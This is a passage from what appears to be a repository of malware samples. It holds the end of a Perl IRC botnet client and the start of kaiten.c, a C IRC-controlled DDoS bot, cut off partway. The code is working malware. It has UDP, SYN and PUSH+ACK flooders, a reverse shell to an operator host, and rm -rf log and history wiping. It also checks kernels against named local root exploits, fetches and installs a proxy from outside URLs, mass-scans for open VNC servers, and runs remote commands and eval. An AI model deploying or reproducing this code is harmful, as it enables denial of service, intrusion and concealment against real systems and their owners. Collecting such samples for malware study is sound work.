:2.:4UDP22:.4 UDP2 Attacking14 ".$1.":".$4." 2with4 ".$2." 2KB(s) for4 ".$3." 2seconds."); 339 | my ($dtime, %pacotes) = udpflooder2("$1", "$2", "$3","$4"); 340 | $dtime = 1 if $dtime == 0; 341 | my %bytes; 342 | $bytes{igmp} = $2 * $pacotes{igmp}; 343 | $bytes{icmp} = $2 * $pacotes{icmp}; 344 | $bytes{o} = $2 * $pacotes{o}; 345 | $bytes{udp} = $2 * $pacotes{udp}; 346 | $bytes{tcp} = $2 * $pacotes{tcp}; 347 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1."."); 348 | } 349 | ############################################################ 350 | 351 | 352 | ########################################################### 353 | ######################[.@cleanlogs.]####################### 354 | ########################################################### 355 | 356 | if ($funcarg =~ /^cleanlogs/) { 357 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 This process can be long2,4 just wait2!"); 358 | system 'rm -rf /var/log/lastlog'; 359 | system 'rm -rf /var/log/wtmp'; 360 | system 'rm -rf /etc/wtmp'; 361 | system 'rm -rf /var/run/utmp'; 362 | system 'rm -rf /etc/utmp'; 363 | system 'rm -rf /var/log'; 364 | system 'rm -rf /var/logs'; 365 | system 'rm -rf /var/adm'; 366 | system 'rm -rf /var/apache/log'; 367 | system 'rm -rf /var/apache/logs'; 368 | system 'rm -rf /usr/local/apache/log'; 369 | system 'rm -rf /usr/local/apache/logs'; 370 | system 'rm -rf /root/.bash_history'; 371 | system 'rm -rf /root/.ksh_history'; 372 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 All default log and bash_history files erased"); 373 | sleep 1; 374 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Now Erasing the rest of the machine log files"); 375 | system 'find / -name *.bash_history -exec rm -rf {} \;'; 376 | system 'find / -name *.bash_logout -exec rm -rf {} \;'; 377 | system 'find / -name "log*" -exec rm -rf {} \;'; 378 | system 'find / -name *.log -exec rm -rf {} \;'; 379 | sleep 1; 380 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Done! All logs erased"); 381 | } 382 | 383 | ########################################################### 384 | ######################[.@cleanlogs.]####################### 385 | ########################################################### 386 | 387 | ########################################################### 388 | ########################[..@back..]######################## 389 | ########################################################### 390 | 391 | if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { 392 | my $host = "$1"; 393 | my $porta = "$2"; 394 | my $proto = getprotobyname('tcp'); 395 | my $iaddr = inet_aton($host); 396 | my $paddr = sockaddr_in($porta, $iaddr); 397 | my $shell = "/bin/sh -i"; 398 | if ($^O eq "MSWin32") { 399 | $shell = "cmd.exe"; 400 | } 401 | socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; 402 | connect(SOCKET, $paddr) or die "connect: $!"; 403 | open(STDIN, ">&SOCKET"); 404 | open(STDOUT, ">&SOCKET"); 405 | open(STDERR, ">&SOCKET"); 406 | system("$shell"); 407 | close(STDIN); 408 | close(STDOUT); 409 | close(STDERR); 410 | if ($estatisticas){ 411 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Back Connect2:.14 Connecting to 2 $host:$porta"); 412 | } 413 | } 414 | 415 | ########################################################### 416 | ########################[..@back..]######################## 417 | ########################################################### 418 | 419 | ########################################################### 420 | #######################[.@rootable.]####################### 421 | ########################################################### 422 | 423 | if ($funcarg =~ /^rootable/) { 424 | my $khost = `uname -r`; 425 | my $currentid = `whoami`; 426 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4r00table2:.14 Currently you are ".$currentid." "); 427 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4r00table2:.14 The kernel of this box is ".$khost." "); 428 | chomp($khost); 429 | 430 | my %h; 431 | $h{'w00t'} = { 432 | vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] 433 | }; 434 | 435 | $h{'brk'} = { 436 | vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] 437 | }; 438 | 439 | $h{'ave'} = { 440 | vuln=>['2.4.19','2.4.20'] 441 | }; 442 | 443 | $h{'elflbl'} = { 444 | vuln=>['2.4.29'] 445 | }; 446 | 447 | $h{'elfdump'} = { 448 | vuln=>['2.4.27'] 449 | }; 450 | 451 | $h{'expand_stack'} = { 452 | vuln=>['2.4.29'] 453 | }; 454 | 455 | $h{'h00lyshit'} = { 456 | vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2'] 457 | }; 458 | 459 | $h{'kdump'} = { 460 | vuln=>['2.6.13'] 461 | }; 462 | 463 | $h{'km2'} = { 464 | vuln=>['2.4.18','2.4.22'] 465 | }; 466 | 467 | $h{'krad'} = { 468 | vuln=>['2.6.11'] 469 | }; 470 | 471 | $h{'krad3'} = { 472 | vuln=>['2.6.11','2.6.9'] 473 | }; 474 | 475 | $h{'local26'} = { 476 | vuln=>['2.6.13'] 477 | }; 478 | 479 | $h{'loko'} = { 480 | vuln=>['2.4.22','2.4.23','2.4.24'] 481 | }; 482 | 483 | $h{'mremap_pte'} = { 484 | vuln=>['2.4.20','2.2.25','2.4.24'] 485 | }; 486 | 487 | $h{'newlocal'} = { 488 | vuln=>['2.4.17','2.4.19','2.4.18'] 489 | }; 490 | 491 | $h{'ong_bak'} = { 492 | vuln=>['2.4.','2.6.'] 493 | }; 494 | 495 | $h{'ptrace'} = { 496 | vuln=>['2.2.','2.4.22'] 497 | }; 498 | 499 | $h{'ptrace_kmod'} = { 500 | vuln=>['2.4.2'] 501 | }; 502 | 503 | $h{'ptrace24'} = { 504 | vuln=>['2.4.9'] 505 | }; 506 | 507 | $h{'pwned'} = { 508 | vuln=>['2.4.','2.6.'] 509 | }; 510 | 511 | $h{'py2'} = { 512 | vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] 513 | }; 514 | 515 | $h{'raptor_prctl'} = { 516 | vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] 517 | }; 518 | 519 | $h{'prctl3'} = { 520 | vuln=>['2.6.13','2.6.17','2.6.9'] 521 | }; 522 | 523 | $h{'remap'} = { 524 | vuln=>['2.4.'] 525 | }; 526 | 527 | $h{'rip'} = { 528 | vuln=>['2.2.'] 529 | }; 530 | 531 | $h{'stackgrow2'} = { 532 | vuln=>['2.4.29','2.6.10'] 533 | }; 534 | 535 | $h{'uselib24'} = { 536 | vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] 537 | }; 538 | 539 | $h{'newsmp'} = { 540 | vuln=>['2.6.'] 541 | }; 542 | 543 | $h{'smpracer'} = { 544 | vuln=>['2.4.29'] 545 | }; 546 | 547 | $h{'loginx'} = { 548 | vuln=>['2.4.22'] 549 | }; 550 | 551 | $h{'exp.sh'} = { 552 | vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] 553 | }; 554 | 555 | $h{'prctl'} = { 556 | vuln=>['2.6.'] 557 | }; 558 | 559 | $h{'kmdx'} = { 560 | vuln=>['2.6.','2.4.'] 561 | }; 562 | 563 | $h{'raptor'} = { 564 | vuln=>['2.6.13','2.6.14','2.6.15','2.6.16'] 565 | }; 566 | 567 | $h{'raptor2'} = { 568 | vuln=>['2.6.13','2.6.14','2.6.15','2.6.16'] 569 | }; 570 | 571 | foreach my $key(keys %h){ 572 | foreach my $kernel ( @{ $h{$key}{'vuln'} } ){ 573 | if($khost=~/^$kernel/){ 574 | chop($kernel) if ($kernel=~/.$/); 575 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4r00table2:.14 Possible Local Root Exploits: ". $key ." "); 576 | } 577 | } 578 | } 579 | } 580 | ########################################################### 581 | #######################[.@rootable.]####################### 582 | ########################################################### 583 | 584 | ########################################################### 585 | #######################[.@sendmail.]####################### 586 | ########################################################### 587 | 588 | if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { 589 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Mailer2:.14 Sending Mail to : 2 $3"); 590 | $subject = $1; 591 | $sender = $2; 592 | $recipient = $3; 593 | @corpo = $4; 594 | $mailtype = "content-type: text/html"; 595 | $sendmail = '/usr/sbin/sendmail'; 596 | open (SENDMAIL, "| $sendmail -t"); 597 | print SENDMAIL "$mailtype\n"; 598 | print SENDMAIL "Subject: $subject\n"; 599 | print SENDMAIL "From: $sender\n"; 600 | print SENDMAIL "To: $recipient\n\n"; 601 | print SENDMAIL "@corpo\n\n"; 602 | close (SENDMAIL); 603 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Mailer2:.14 Mail Sent To : 2 $recipient"); 604 | } 605 | 606 | ########################################################### 607 | #######################[.@sendmail.]####################### 608 | ########################################################### 609 | 610 | ########################################################### 611 | ########################[.@socks5.]######################## 612 | ########################################################### 613 | 614 | if ($funcarg =~ /^socks5/) { 615 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 Installing Mocks please wait4"); 616 | system 'cd /tmp'; 617 | system 'wget http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz'; 618 | system 'tar -xvfz mocks-0.0.2.tar.gz'; 619 | system 'rm -rf mocks-0.0.2.tar.gz'; 620 | system 'cd mocks-0.0.2'; 621 | system 'rm -rf mocks.conf'; 622 | system 'curl -O http://andromeda.covers.de/221/mocks.conf'; 623 | system 'touch mocks.log'; 624 | system 'chmod 0 mocks.log'; 625 | sleep(2); 626 | system './mocks start'; 627 | sleep(4); 628 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 Looks like its succesfully installed lets do the last things4 "); 629 | 630 | #lets grab ip 631 | $net = `/sbin/ifconfig | grep 'eth0'`; 632 | if (length($net)) 633 | { 634 | $net = `/sbin/ifconfig eth0 | grep 'inet addr'`; 635 | if (!length($net)) 636 | { 637 | $net = `/sbin/ifconfig eth0 | grep 'inet end.'`; 638 | } 639 | if (length($net)) 640 | { 641 | chop($net); 642 | @netip = split/:/,$net; 643 | $netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/; 644 | $ip = $1 .".". $2 .".". $3 .".". $4; 645 | 646 | #and print it ^^ 647 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 Connect here :4 ". $ip .":8787 "); 648 | } 649 | else 650 | { 651 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 IP not founded "); 652 | } 653 | } 654 | else 655 | { 656 | sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SocksV512] ERROR WHILE INSTALLING MOCKS "); 657 | } 658 | } 659 | 660 | ########################################################### 661 | ########################[.@socks5.]######################## 662 | ########################################################### 663 | 664 | ########################################################### 665 | ##########################[.@vnc.]######################### 666 | 667 | ########################################################### 668 | 669 | #r0xb0t 4.6 VNC ScaNNer by ARZ 670 | if ($funcarg =~ /^vnc\s+(.*)/) { 671 | my $MAX_SOCKET_TIME = 2; 672 | my $MAX_CONNECT_TIME = 3; 673 | #&ftpcheckm($printl); 674 | my @hosts; 675 | my $MAX_PROCESSES=100; 676 | my $host=$1; 677 | #my $victim=$host; 678 | sendraw($IRC_cur_socket, "PRIVMSG $printl :_12[_4@_VNC_12] :::: IP Range:_4 $host* "); 679 | $|=1; 680 | 681 | foreach (0..255) { 682 | my $pre="$host.$_."; 683 | foreach (1..255) { 684 | push(@hosts,$pre.$_); 685 | } 686 | } 687 | 688 | my @pids; 689 | my $npids=0; 690 | 691 | for $victim (@hosts){ 692 | my $pid; 693 | $pid=fork(); 694 | if($pid>0){ 695 | $npids++; 696 | if($npids>=$MAX_PROCESSES){ 697 | for(1..($MAX_PROCESSES)){ 698 | $wait_ret=wait(); 699 | if($wait_ret>0){ 700 | $npids--; 701 | } 702 | } 703 | } 704 | next; 705 | } elsif(undef $pid) { 706 | # print "fork error\n" if ($DEBUG); 707 | exit(0); 708 | }else{ 709 | my($proto,$port); 710 | $0=""; 711 | # kill thread on timeout 712 | local $SIG{'ALRM'} = sub { exit(0); }; 713 | alarm $MAX_SOCKET_TIME; 714 | my $port=5900; 715 | print "Connecting to $victim:$port..."; 716 | #$| = 1; 717 | ($sock = IO::Socket::INET->new(PeerAddr => $victim,PeerPort => $port,Proto => 'tcp',)) ? print "\n": die("\n"); 718 | 719 | #negotiate protocol 720 | $sock->read($protocol_version,12); 721 | print $sock $protocol_version; 722 | print "Using protocol $protocol_version"; 723 | $sock->read($security_types,1); 724 | $sock->read($hahaha,unpack('C',$security_types)); 725 | print $sock "\x01"; 726 | $sock->read($in,4); 727 | if(unpack('I',$in)) { die("\n") }; 728 | print $sock "\x01"; 729 | $sock->read($in,4); 730 | (unpack('I',$in)) ? 731 | sendraw($IRC_cur_socket, "PRIVMSG $printl :_12[_4@_VNC_12] ::::_4 ".$victim." _12is Vulnerable using protocol_4 ".$protocol_version): die("\n"); 732 | 733 | exit; 734 | 735 | } 736 | } 737 | 738 | for(1..$npids){ 739 | my $wt=wait(); 740 | if($wt==-1){ 741 | # print "hey $!\n" if($DEBUG); 742 | redo; 743 | } 744 | } 745 | sendraw($IRC_cur_socket, "PRIVMSG $printl :_12[_4@_VNC_12] :::: Finished Scan for _4 $host "); 746 | } 747 | ########################################################### 748 | ##########################[.@vnc.]######################### 749 | 750 | ########################################################### 751 | 752 | ########################################################### 753 | #########################[.@nmap.]######################### 754 | ########################################################### 755 | 756 | if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){ 757 | my $hostip="$1"; 758 | my $portstart = "$2"; 759 | my $portend = "$3"; 760 | my (@abertas, %porta_banner); 761 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Scanning $1 For Ports: $2-$3"); 762 | foreach my $porta ($portstart..$portend){ 763 | my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); 764 | if ($scansock) { 765 | push (@abertas, $porta); 766 | $scansock->close; 767 | if ($xstats){ 768 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Founded $porta"."/Open"); 769 | } 770 | } 771 | } 772 | if (@abertas) { 773 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Complete"); 774 | } else { 775 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 No open ports have been founded"); 776 | } 777 | } 778 | ########################################################### 779 | #########################[.@nmap.]######################### 780 | ########################################################### 781 | 782 | 783 | 784 | exit; 785 | } 786 | } 787 | } 788 | 789 | sub ircase { 790 | my ($kem, $printl, $case) = @_; 791 | 792 | if ($case =~ /^join (.*)/) { 793 | j("$1"); 794 | } 795 | if ($case =~ /^part (.*)/) { 796 | p("$1"); 797 | } 798 | if ($case =~ /^rejoin\s+(.*)/) { 799 | my $chan = $1; 800 | if ($chan =~ /^(\d+) (.*)/) { 801 | for (my $ca = 1; $ca <= $1; $ca++ ) { 802 | p("$2"); 803 | j("$2"); 804 | } 805 | } else { 806 | p("$chan"); 807 | j("$chan"); 808 | } 809 | } 810 | if ($case =~ /^op/) { 811 | op("$printl", "$kem") if $case eq "op"; 812 | my $oarg = substr($case, 3); 813 | op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); 814 | } 815 | if ($case =~ /^deop/) { 816 | deop("$printl", "$kem") if $case eq "deop"; 817 | my $oarg = substr($case, 5); 818 | deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); 819 | } 820 | if ($case =~ /^msg\s+(\S+) (.*)/) { 821 | msg("$1", "$2"); 822 | } 823 | if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { 824 | for (my $cf = 1; $cf <= $1; $cf++) { 825 | msg("$2", "$3"); 826 | } 827 | } 828 | if ($case =~ /^ctcp\s+(\S+) (.*)/) { 829 | ctcp("$1", "$2"); 830 | } 831 | if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { 832 | for (my $cf = 1; $cf <= $1; $cf++) { 833 | ctcp("$2", "$3"); 834 | } 835 | } 836 | if ($case =~ /^nick (.*)/) { 837 | nick("$1"); 838 | } 839 | if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { 840 | conectar("$2", "$1", 6667); 841 | } 842 | if ($case =~ /^raw (.*)/) { 843 | sendraw("$1"); 844 | } 845 | if ($case =~ /^eval (.*)/) { 846 | eval "$1"; 847 | } 848 | } 849 | 850 | sub shell { 851 | my $printl=$_[0]; 852 | my $comando=$_[1]; 853 | if ($comando =~ /cd (.*)/) { 854 | chdir("$1") || msg("$printl", "No such file or directory"); 855 | return; 856 | } 857 | elsif ($pid = fork) { 858 | waitpid($pid, 0); 859 | } else { 860 | if (fork) { 861 | exit; 862 | } else { 863 | my @resp=`$comando 2>&1 3>&1`; 864 | my $c=0; 865 | foreach my $linha (@resp) { 866 | $c++; 867 | chop $linha; 868 | sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); 869 | if ($c == "$linas_max") { 870 | $c=0; 871 | sleep $sleep; 872 | } 873 | } 874 | exit; 875 | } 876 | } 877 | } 878 | 879 | sub tcpflooder { 880 | my $itime = time; 881 | my ($cur_time); 882 | my ($ia,$pa,$proto,$j,$l,$t); 883 | $ia=inet_aton($_[0]); 884 | $pa=sockaddr_in($_[1],$ia); 885 | $ftime=$_[2]; 886 | $proto=getprotobyname('tcp'); 887 | $j=0;$l=0; 888 | $cur_time = time - $itime; 889 | while ($l<1000){ 890 | $cur_time = time - $itime; 891 | last if $cur_time >= $ftime; 892 | $t="SOCK$l"; 893 | socket($t,PF_INET,SOCK_STREAM,$proto); 894 | connect($t,$pa)||$j--; 895 | $j++;$l++; 896 | } 897 | $l=0; 898 | while ($l<1000){ 899 | $cur_time = time - $itime; 900 | last if $cur_time >= $ftime; 901 | $t="SOCK$l"; 902 | shutdown($t,2); 903 | $l++; 904 | } 905 | } 906 | 907 | sub udpflooder { 908 | my $iaddr = inet_aton($_[0]); 909 | my $msg = 'A' x $_[1]; 910 | my $ftime = $_[2]; 911 | my $cp = 0; 912 | my (%pacotes); 913 | $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; 914 | 915 | socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; 916 | socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; 917 | socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; 918 | socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; 919 | return(undef) if $cp == 4; 920 | my $itime = time; 921 | my ($cur_time); 922 | while ( 1 ) { 923 | for (my $port = 1; $port <= 65000; $port++) { 924 | $cur_time = time - $itime; 925 | last if $cur_time >= $ftime; 926 | send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++; 927 | send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++; 928 | send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++; 929 | send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++; 930 | 931 | for (my $pc = 3; $pc <= 255;$pc++) { 932 | next if $pc == 6; 933 | $cur_time = time - $itime; 934 | last if $cur_time >= $ftime; 935 | socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; 936 | send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++; 937 | } 938 | } 939 | last if $cur_time >= $ftime; 940 | } 941 | return($cur_time, %pacotes); 942 | } 943 | 944 | sub udpflooder2 { 945 | my $iaddr = inet_aton($_[0]); 946 | my $msg = 'A' x $_[1]; 947 | my $ftime = $_[2]; 948 | my $cp = 0; 949 | my $udpport = $_[3]; 950 | my (%pacotes); 951 | $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; 952 | 953 | socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; 954 | socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; 955 | socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; 956 | socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; 957 | return(undef) if $cp == 4; 958 | my $itime = time; 959 | my ($cur_time); 960 | while ( 1 ) { 961 | $cur_time = time - $itime; 962 | last if $cur_time >= $ftime; 963 | send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++; 964 | send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++; 965 | send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++; 966 | send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++; 967 | 968 | for (my $pc = 3; $pc <= 255;$pc++) { 969 | next if $pc == 6; 970 | $cur_time = time - $itime; 971 | last if $cur_time >= $ftime; 972 | socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; 973 | send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++; 974 | } 975 | last if $cur_time >= $ftime; 976 | } 977 | return($cur_time, %pacotes); 978 | } 979 | sub ctcp { 980 | return unless $#_ == 1; 981 | sendraw("PRIVMSG $_[0] :\001$_[1]\001"); 982 | } 983 | sub msg { 984 | return unless $#_ == 1; 985 | sendraw("PRIVMSG $_[0] :$_[1]"); 986 | } 987 | sub notice { 988 | return unless $#_ == 1; 989 | sendraw("NOTICE $_[0] :$_[1]"); 990 | } 991 | sub op { 992 | return unless $#_ == 1; 993 | sendraw("MODE $_[0] +o $_[1]"); 994 | } 995 | sub deop { 996 | return unless $#_ == 1; 997 | sendraw("MODE $_[0] -o $_[1]"); 998 | } 999 | sub j { &join(@_); } 1000 | sub join { 1001 | return unless $#_ == 0; 1002 | sendraw("JOIN $_[0]"); 1003 | } 1004 | sub p { part(@_); } 1005 | sub part { 1006 | sendraw("PART $_[0]"); 1007 | } 1008 | sub nick { 1009 | return unless $#_ == 0; 1010 | sendraw("NICK $_[0]"); 1011 | } 1012 | sub quit { 1013 | sendraw("QUIT :$_[0]"); 1014 | } 1015 | -------------------------------------------------------------------------------- /malicious_samples/kaiten.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * This is a IRC based distributed denial of service client. It connects to * 3 | * the server specified below and accepts commands via the channel specified. * 4 | * The syntax is: * 5 | * ! * 6 | * You send this message to the channel that is defined later in this code. * 7 | * Where is the nickname of the client (which can include wildcards) * 8 | * and the command is the command that should be sent. For example, if you * 9 | * want to tell all the clients with the nickname starting with N, to send you * 10 | * the help message, you type in the channel: * 11 | * !N* HELP * 12 | * That will send you a list of all the commands. You can also specify an * 13 | * astrick alone to make all client do a specific command: * 14 | * !* SH uname -a * 15 | * There are a number of commands that can be sent to the client: * 16 | * TSUNAMI = A PUSH+ACK flooder * 17 | * PAN = A SYN flooder * 18 | * UDP = An UDP flooder * 19 | * UNKNOWN = Another non-spoof udp flooder * 20 | * NICK = Changes the nick of the client * 21 | * SERVER = Changes servers * 22 | * GETSPOOFS = Gets the current spoofing * 23 | * SPOOFS = Changes spoofing to a subnet * 24 | * DISABLE = Disables all packeting from this bot * 25 | * ENABLE = Enables all packeting from this bot * 26 | * KILL = Kills the knight * 27 | * GET = Downloads a file off the web * 28 | * VERSION = Requests version of knight * 29 | * KILLALL = Kills all current packeting * 30 | * HELP = Displays this * 31 | * IRC = Sends this command to the server * 32 | * SH = Executes a command * 33 | * Remember, all these commands must be prefixed by a ! and the nickname that * 34 | * you want the command to be sent to (can include wildcards). There are no * 35 | * spaces in between the ! and the nickname, and there are no spaces before * 36 | * the ! * 37 | * * 38 | * - contem on efnet * 39 | *******************************************************************************/ 40 | //////////////////////////////////////////////////////////////////////////////// 41 | // EDIT THESE // 42 | //////////////////////////////////////////////////////////////////////////////// 43 | #undef STARTUP // Start on startup? 44 | #undef IDENT // Only enable this if you absolutely have to 45 | #define FAKENAME "-amadz" // What you want this to hide as 46 | #define CHAN "#lol" // Channel to join 47 | #define KEY "bleh" // The key of the channel 48 | int numservers=1; // Must change this to equal number of servers down there 49 | char *servers[] = { // List the servers in that format, always end in (void*)0 50 | "192.168.93.137", 51 | (void*)0 52 | }; 53 | //////////////////////////////////////////////////////////////////////////////// 54 | // STOP HERE! // 55 | //////////////////////////////////////////////////////////////////////////////// 56 | #include 57 | #include 58 | #include 59 | #include 60 | #include 61 | #include 62 | #include 63 | #include 64 | #include 65 | #include 66 | #include 67 | #include 68 | #include 69 | #include 70 | #include 71 | #include 72 | #include 73 | #include 74 | #include 75 | int sock,changeservers=0; 76 | char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256]; 77 | unsigned int *pids; 78 | unsigned long spoofs=0, spoofsm=0, numpids=0; 79 | int strwildmatch(const char* pattern, const char* string) { 80 | switch(*pattern) { 81 | case '\0': return *string; 82 | case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1)); 83 | case '?': return !(*string && !strwildmatch(pattern+1, string+1)); 84 | default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1)); 85 | } 86 | } 87 | int Send(int sock, char *words, ...) { 88 | static char textBuffer[1024]; 89 | va_list args; 90 | va_start(args, words); 91 | vsprintf(textBuffer, words, args); 92 | va_end(args); 93 | return write(sock,textBuffer,strlen(textBuffer)); 94 | } 95 | int mfork(char *sender) { 96 | unsigned int parent, *newpids, i; 97 | if (disabled == 1) { 98 | Send(sock,"NOTICE %s :Unable to comply.\n",sender); 99 | return 1; 100 | } 101 | parent=fork(); 102 | if (parent <= 0) return parent; 103 | numpids++; 104 | newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int)); 105 | for (i=0;i= 20) exit(0); 161 | szBuffer[i]=0; 162 | if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0; 163 | if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0; 164 | Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident); 165 | close(tmpsock); 166 | close(sockfd); 167 | exit(0); 168 | } 169 | long pow(long a, long b) { 170 | if (b == 0) return 1; 171 | if (b == 1) return a; 172 | return a*pow(a,b-1); 173 | } 174 | u_short in_cksum(u_short *addr, int len) { 175 | register int nleft = len; 176 | register u_short *w = addr; 177 | register int sum = 0; 178 | u_short answer =0; 179 | while (nleft > 1) { 180 | sum += *w++; 181 | nleft -= 2; 182 | } 183 | if (nleft == 1) { 184 | *(u_char *)(&answer) = *(u_char *)w; 185 | sum += answer; 186 | } 187 | sum = (sum >> 16) + (sum & 0xffff); 188 | sum += (sum >> 16); 189 | answer = ~sum; 190 | return(answer); 191 | } 192 | void get(int sock, char *sender, int argc, char **argv) { 193 | int sock2,i,d; 194 | struct sockaddr_in server; 195 | unsigned long ipaddr; 196 | char buf[1024]; 197 | FILE *file; 198 | unsigned char bufm[4096]; 199 | if (mfork(sender) != 0) return; 200 | if (argc < 2) { 201 | Send(sock,"NOTICE %s :GET \n",sender); 202 | exit(0); 203 | } 204 | if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) { 205 | Send(sock,"NOTICE %s :Unable to create socket.\n",sender); 206 | exit(0); 207 | } 208 | if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7); 209 | else strcpy(buf,argv[1]); 210 | for (i=0;ih_addr, hostm->h_length); 221 | } 222 | else server.sin_addr.s_addr = ipaddr; 223 | memset(&(server.sin_zero), 0, 8); 224 | if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) { 225 | Send(sock,"NOTICE %s :Unable to connect to http.\n",sender); 226 | exit(0); 227 | } 228 | 229 | Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf); 230 | Send(sock,"NOTICE %s :Receiving file.\n",sender); 231 | file=fopen(argv[2],"wb"); 232 | while(1) { 233 | int i; 234 | if ((i=recv(sock2,bufm,4096,0)) <= 0) break; 235 | if (i < 4096) bufm[i]=0; 236 | for (d=0;d\n",sender); 264 | return; 265 | } 266 | if (strlen(argv[1]) >= 10) { 267 | Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender); 268 | return; 269 | } 270 | Send(sock,"NICK %s\n",argv[1]); 271 | } 272 | void disable(int sock, char *sender, int argc, char **argv) { 273 | if (argc != 1) { 274 | Send(sock,"NOTICE %s :DISABLE \n",sender); 275 | Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders"); 276 | return; 277 | } 278 | if (disabled) { 279 | Send(sock,"NOTICE %s :Already disabled.\n",sender); 280 | return; 281 | } 282 | if (strlen(argv[1]) > 254) { 283 | Send(sock,"NOTICE %s :Password too long! > 254\n",sender); 284 | return; 285 | } 286 | disabled=1; 287 | memset(dispass,0,256); 288 | strcpy(dispass,argv[1]); 289 | Send(sock,"NOTICE %s :Disable sucessful.\n"); 290 | } 291 | void enable(int sock, char *sender, int argc, char **argv) { 292 | if (argc != 